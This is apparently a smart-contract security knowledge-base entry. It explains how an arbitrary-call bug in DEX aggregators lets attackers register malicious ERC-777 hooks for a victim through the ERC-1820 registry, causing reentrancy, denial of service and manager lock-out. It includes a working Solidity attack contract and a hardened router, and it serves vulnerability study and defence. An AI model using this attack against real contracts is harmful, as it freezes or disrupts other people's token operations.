# ERC-777 arbitrary hook assignment via ERC-1820 registry enables attacker-controlled callbacks on victim contracts
ERC-777 does not store hook addresses in the token contract; it looks them up in the ERC-1820 registry, which maps any Ethereum address (EOA or contract) to an implementer for the `ERC777TokensSender` and `ERC777TokensRecipient` interface hashes. The registry's only access check on `setInterfaceImplementer(addr, interfaceHash, implementer)` is that `msg.sender` is the manager of `addr`, and every address is its own manager until it delegates. A contract that exposes an arbitrary-call primitive (`target.call(data)` with caller-supplied target and calldata, common in DEX aggregators and multicall routers) therefore lets an attacker make the victim call `ERC1820Registry.setInterfaceImplementer()` on its own behalf and register an attacker-controlled contract as the victim's hook. The only other requirement is that the registered contract answer `canImplementInterfaceForAddress()` with the `ERC1820_ACCEPT_MAGIC` value, which a contract written by the attacker trivially does.
From then on, every ERC-777 transfer into or out of the victim invokes the attacker's hook: `tokensToSend` before balances are updated, `tokensReceived` after. Two consequences follow. The hook can re-enter the victim while a transfer is in flight, at a point where the victim's code never expected an external call. Or the hook can simply revert, which reverts the enclosing transfer and denies service to every function that depends on moving ERC-777 tokens. That denial persists until the victim re-registers a benign implementer, and if the attacker also used the arbitrary call to invoke `setManager()` and assign itself as the victim's ERC-1820 manager, the victim can no longer do so from its own address.
This attack vector is particularly dangerous for DEX aggregators and multicall systems that route arbitrary calls through their contracts. Since [[ERC-721 safeTransferFrom and ERC-777 tokensReceived callbacks create reentrancy entry points in any protocol handling these token standards]], the existing reentrancy risk from ERC-777 is amplified when the hook can be registered by an adversary rather than only by the contract's own developers. The indirection through the ERC-1820 registry also makes the hook assignment a separate, easily overlooked transaction: nothing in the victim's own storage changes, so monitoring that watches only the victim contract will not see it.
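The whole chain, as an added Solidity illustration (not code from any real aggregator, nor from the ERC-777 or ERC-1820 reference implementations): a router with the arbitrary-call primitive, the hook contract the attacker registers, the registry calls the attacker forces the victim to make, and a hardened router. Contract names, the `execute` function and the `denyService` switch are assumptions; the registry address, function signatures and interface hashes are the ones defined by ERC-1820 and ERC-777.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Illustration only; contract and function names are assumed, not taken from any project.

// Minimal ERC-1820 surface. The canonical registry lives at the same address on
// every chain where its keyless deployment transaction was replayed.
interface IERC1820Registry {
    function setInterfaceImplementer(address addr, bytes32 interfaceHash, address implementer) external;
    function setManager(address addr, address newManager) external;
    function getInterfaceImplementer(address addr, bytes32 interfaceHash) external view returns (address);
}

IERC1820Registry constant REGISTRY = IERC1820Registry(0x1820a4B7618BdE71Dff8aC52b8c11F43d9D9Bbd8);
bytes32 constant TOKENS_RECIPIENT = keccak256("ERC777TokensRecipient");
bytes32 constant TOKENS_SENDER = keccak256("ERC777TokensSender");
bytes32 constant ERC1820_ACCEPT_MAGIC = keccak256("ERC1820_ACCEPT_MAGIC");

// Vulnerable router: forwards caller-supplied calldata to any target, so the
// registry sees msg.sender == victim and accepts writes on the victim's behalf.
contract VulnerableAggregator {
    function execute(address target, bytes calldata data) external payable returns (bytes memory) {
        (bool ok, bytes memory ret) = target.call{value: msg.value}(data);
        require(ok, "call failed");
        return ret;
    }
}

// Attacker-controlled hook. ERC-1820 only accepts a third-party implementer that
// returns ERC1820_ACCEPT_MAGIC from canImplementInterfaceForAddress.
contract MaliciousHook {
    address public immutable victim;
    bool public immutable denyService; // true: revert every transfer; false: re-enter
    bool public reentered;

    constructor(address _victim, bool _denyService) {
        victim = _victim;
        denyService = _denyService;
    }

    function canImplementInterfaceForAddress(bytes32 interfaceHash, address addr) external view returns (bytes32) {
        if (addr == victim && (interfaceHash == TOKENS_RECIPIENT || interfaceHash == TOKENS_SENDER)) {
            return ERC1820_ACCEPT_MAGIC;
        }
        return bytes32(0);
    }

    // Invoked by every ERC-777 token after balances update on a transfer INTO the victim.
    function tokensReceived(address, address, address, uint256, bytes calldata, bytes calldata) external {
        if (denyService) revert("hook: blocked");
        // Reentrancy branch: the victim is mid-transfer here; a real exploit would call
        // back into it. For illustration we only record that the callback fired.
        reentered = true;
    }

    // Invoked before balances update on a transfer OUT OF the victim.
    function tokensToSend(address, address, address, uint256, bytes calldata, bytes calldata) external {
        if (denyService) revert("hook: blocked");
        reentered = true;
    }
}

contract Attack {
    function run(VulnerableAggregator victim) external returns (address hookAddr) {
        MaliciousHook hook = new MaliciousHook(address(victim), true);
        // The registry requires getManager(victim) == msg.sender and the victim is its own
        // manager by default, so these calls must originate FROM the victim: execute() does that.
        victim.execute(address(REGISTRY), abi.encodeCall(
            IERC1820Registry.setInterfaceImplementer, (address(victim), TOKENS_RECIPIENT, address(hook))));
        victim.execute(address(REGISTRY), abi.encodeCall(
            IERC1820Registry.setInterfaceImplementer, (address(victim), TOKENS_SENDER, address(hook))));
        // Lock-out: make the attacker the victim's ERC-1820 manager, so the victim can never
        // re-register from its own address, even through a legitimate code path added later.
        victim.execute(address(REGISTRY), abi.encodeCall(
            IERC1820Registry.setManager, (address(victim), address(this))));
        return address(hook);
    }
}

// Hardened router with two independent defences:
//  (1) targets come from an allow-list that can never include the registry;
//  (2) ERC-1820 management for this contract is handed to a trusted admin at deployment,
//      so any call FROM this contract to setInterfaceImplementer fails the registry's
//      manager check even if (1) is ever bypassed.
contract HardenedAggregator {
    mapping(address => bool) public allowedTarget;

    constructor(address admin, address[] memory targets) {
        for (uint256 i = 0; i < targets.length; i++) {
            require(targets[i] != address(REGISTRY), "registry not routable");
            allowedTarget[targets[i]] = true;
        }
        REGISTRY.setManager(address(this), admin); // reverts if the registry is absent on this chain
    }

    function execute(address target, bytes calldata data) external payable returns (bytes memory) {
        require(allowedTarget[target], "target not allowed");
        (bool ok, bytes memory ret) = target.call{value: msg.value}(data);
        require(ok, "call failed");
        return ret;
    }
}
```

After `Attack.run`, `REGISTRY.getInterfaceImplementer(victim, TOKENS_RECIPIENT)` returns the hook address and any ERC-777 `send`/`transfer` touching the victim reverts with "hook: blocked". The `setManager` defence in `HardenedAggregator` works because the registry resolves the manager before accepting any write; once the manager is the admin, the contract's own address is no longer authorised, which is exactly the authority an arbitrary-call bug would otherwise hand to the attacker. The trade-off is that the admin key must then be the one that registers legitimate hooks, and it must be protected accordingly.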
---
Relevant Notes:
- [[ERC-721 safeTransferFrom and ERC-777 tokensReceived callbacks create reentrancy entry points in any protocol handling these token standards]] — the foundational callback reentrancy risk this attack escalates
- [[arbitrary storage writes enable attackers to overwrite critical variables when dynamic array slot calculations are manipulable]] — arbitrary call vulnerabilities enable storage manipulation in the same class of attack
- [[access control vulnerabilities are the leading cause of smart contract financial losses]] — arbitrary call as an access control failure enabling registry manipulation
Topics:
- [[vulnerability-patterns]]
- [[protocol-mechanics]]